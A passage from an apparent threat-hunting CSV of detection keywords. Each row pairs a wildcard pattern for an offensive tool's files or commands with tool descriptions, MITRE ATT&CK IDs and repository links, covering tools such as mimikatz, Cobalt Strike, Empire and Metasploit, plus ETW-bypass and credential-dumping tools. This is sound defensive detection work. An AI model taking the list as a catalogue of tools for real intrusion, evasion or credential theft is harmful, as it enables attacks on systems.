posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*enum_ms_product_keys.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*enum_printers.py*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*enum_shares.py*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*enum_shares.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*enum_vmware.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*enum_vyos.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*enum4linux*","offensive_tool_keyword","enum4linux","Enum4linux is a tool for enumerating information from Windows and Samba systems. It attempts to offer similar functionality to enum.exe ","T1018 - T1087.002 - T1135 - T1049 - T1033","TA0007 - TA0009","N/A","N/A","Reconnaissance","https://github.com/CiscoCXSecurity/enum4linux","1","1","N/A","N/A","10","944","228","2023-05-09T22:54:24Z","2015-07-31T21:06:03Z" +"*enum4linux_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*enum4linux-ng -A -u *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*EnumCLR.exe*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF to identify processes with the CLR loaded with a goal of identifying SpawnTo / injection candidates.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://gist.github.com/G0ldenGunSec/8ca0e853dd5637af2881697f8de6aecc","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*Enum-Creds*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*enumerate.cna*","offensive_tool_keyword","red-team-scripts","Cobalt Strike Aggressor script function and alias to perform some rudimentary Windows host enumeration with Beacon built-in commands (i.e. no Powershell. binary calls. or process injection). Additionally. adds a basic enumerate alias for Linux based systems in SSH sessions.","T1595 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/threatexpress/red-team-scripts","1","1","N/A","N/A","10","1089","197","2019-11-18T05:30:18Z","2017-05-01T13:53:05Z" +"*EnumerateAllDomainControllers*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*Enumerate-AllHighPrivilegePrincipals*","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/csandker/Azure-AccessPermissions","1","0","N/A","6","1","90","16","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z" +"*EnumerateDomainGpo*","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","N/A","AD Enumeration","https://github.com/Group3r/Group3r","1","0","N/A","N/A","5","488","47","2023-08-07T16:45:14Z","2021-07-05T05:05:42Z" +"*Enumerate-MFAStatusOfHighPrivilegePrincipals*","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/csandker/Azure-AccessPermissions","1","0","N/A","6","1","90","16","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z" +"*Enumeration/DesktopACL*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","1","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z" +"*Enumeration\DesktopAC*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z" +"*env_var_spoofing_poc.cpp*","offensive_tool_keyword","ETW","stop ETW from giving up your loaded .NET assemblies to that pesky EDR but can't be bothered patching memory? Just pass COMPlus_ETWEnabled=0 as an environment variable during your CreateProcess call","T1055.001 - T1059.001 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://gist.github.com/xpn/64e5b6f7ad370c343e3ab7e9f9e22503","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*eo.oe.kiwi*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*eppiocemhmnlbhjplcgkofciiegomcon*","greyware_tool_keyword","Urban Free VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*Erebus/*spacerunner*","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","10","10","1356","214","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z" +"*error in libcrypto*","greyware_tool_keyword","ssh","Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml","1","0","greyware tool - risks of False positive !","N/A","10","4103","1020","2023-08-09T15:42:59Z","2013-09-17T17:07:58Z" +"*eRv6yTYhShell*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*ES.Alan.Core/*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" +"*EspressoCake/PPLDump_BOF*","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/PPLDump_BOF","1","1","N/A","10","10","131","24","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z" +"*Eternalblue-*.exe*","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","78","37","2023-09-28T08:36:47Z","2021-01-20T13:08:24Z" +"*EternalBlue.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1064","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*eternalblue.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*Eternalblue-Doublepulsar*","offensive_tool_keyword","Eternalblue-Doublepulsar-Metasploit","doublepulsa vulnerability exploit DoublePulsar is a backdoor implant tool developed by the U.S. National Security Agencys (NSA) Equation Group that was leaked by The Shadow Brokers in early 2017.[3] The tool infected more than 200.000 Microsoft Windows computers in only a few weeks.[4][5][3][6][7] and was used alongside EternalBlue in the May 2017 WannaCry ransomware attack.[8][9][10] A variant of DoublePulsar was first seen in the wild in March 2016. as discovered by Symantec. [11]","T1055 - T1043 - T1218","TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/Telefonica/Eternalblue-Doublepulsar-Metasploit","1","1","N/A","N/A","10","1055","545","2021-03-31T09:44:10Z","2017-04-24T12:41:56Z" +"*EternalHushFramework-*-SNAPSHOT.jar*","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/APT64/EternalHushFramework","1","1","N/A","10","10","140","21","2023-09-21T19:04:41Z","2023-07-09T09:13:21Z" +"*EternalHushFramework-main*","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/APT64/EternalHushFramework","1","1","N/A","10","10","140","21","2023-09-21T19:04:41Z","2023-07-09T09:13:21Z" +"*EternalHushMain.java*","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/APT64/EternalHushFramework","1","1","N/A","10","10","140","21","2023-09-21T19:04:41Z","2023-07-09T09:13:21Z" +"*EternalHushWindow.java*","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/APT64/EternalHushFramework","1","1","N/A","10","10","140","21","2023-09-21T19:04:41Z","2023-07-09T09:13:21Z" +"*ethereum2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*etw-bypass*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*ETWEventSubscription*Program.cs*","offensive_tool_keyword","ETWEventSubscription","Similar to WMI event subscriptions but leverages Event Tracing for Windows. When the event on the system occurs currently either when any user logs in or a specified process is started - the DoEvil() method is executed.","T1053.005 - T1546.003 - T1055.001","TA0004 - TA0005","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master/ETWEventSubscription","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*ETWEventSubscription.exe* -ProcStart *","offensive_tool_keyword","ETWEventSubscription","Similar to WMI event subscriptions but leverages Event Tracing for Windows. When the event on the system occurs currently either when any user logs in or a specified process is started - the DoEvil() method is executed.","T1053.005 - T1546.003 - T1055.001","TA0004 - TA0005","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master/ETWEventSubscription","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*ETWEventSubscription.exe* -UserLogon*","offensive_tool_keyword","ETWEventSubscription","Similar to WMI event subscriptions but leverages Event Tracing for Windows. When the event on the system occurs currently either when any user logs in or a specified process is started - the DoEvil() method is executed.","T1053.005 - T1546.003 - T1055.001","TA0004 - TA0005","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master/ETWEventSubscription","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*etw-fuck.exe *","offensive_tool_keyword","Fuck-Etw","Bypass the Event Trace Windows(ETW) and unhook ntdll.","T1070.004 - T1055.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/unkvolism/Fuck-Etw","1","0","N/A","10","1","63","9","2023-09-29T21:19:10Z","2023-09-25T18:59:10Z" +"*EtwHash.exe*","offensive_tool_keyword","ETWHash","C# POC to extract NetNTLMv1/v2 hashes from ETW provider","T1556.001","TA0009 ","N/A","N/A","Credential Access","https://github.com/nettitude/ETWHash","1","1","N/A","N/A","3","229","27","2023-05-10T06:45:06Z","2023-04-26T15:53:01Z" +"*EtwHash.git*","offensive_tool_keyword","ETWHash","C# POC to extract NetNTLMv1/v2 hashes from ETW provider","T1556.001","TA0009 ","N/A","N/A","Credential Access","https://github.com/nettitude/ETWHash","1","1","N/A","N/A","3","229","27","2023-05-10T06:45:06Z","2023-04-26T15:53:01Z" +"*ETWHash.sln*","offensive_tool_keyword","ETWHash","C# POC to extract NetNTLMv1/v2 hashes from ETW provider","T1556.001","TA0009 ","N/A","N/A","Credential Access","https://github.com/nettitude/ETWHash","1","1","N/A","N/A","3","229","27","2023-05-10T06:45:06Z","2023-04-26T15:53:01Z" +"*etwti-hook.*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*evasion/has_recycle_bin.*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*evasion_shellcode.js*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*event::clear*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*event::drop*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from 